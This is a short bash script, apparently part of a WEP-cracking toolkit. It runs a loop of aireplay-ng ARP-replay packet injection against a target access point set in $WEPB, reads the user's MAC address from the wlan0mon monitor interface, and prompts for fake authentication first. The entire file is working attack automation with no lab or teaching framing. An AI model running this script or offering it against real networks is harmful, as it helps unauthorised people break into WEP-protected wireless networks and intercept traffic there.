#! /bin/bash
while true
do
	echo -e "----------------------Packet injection-----------------------"
	echo -e "You need to do the Fake-authentication first!(on the other terminal)"
	if [ "$FIRSTT" = "1" ]
	then
		aireplay-ng -3 -b $WEPB -h $MYMAC wlan0mon
	else
		echo -e "Press any key to start fake authentication..."
		read
		echo -e "Getting you MAC...."
		sleep 1
		MYMAC=$(ifconfig wlan0mon | grep -o -E '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}')
		echo -e "Your MAC is $MYMAC"
		sleep 1
		echo -e "Starting packet injection..."
		sleep 1
		FIRSTT="1"
		aireplay-ng -3 -b $WEPB -h $MYMAC wlan0mon
	fi
	echo -e "Inject packets again?(y/n)(Enter=yes): "
	read REF
	if [ "$REF" = "n" ]
	then
		exit
	else
		clear
		continue
	fi
done
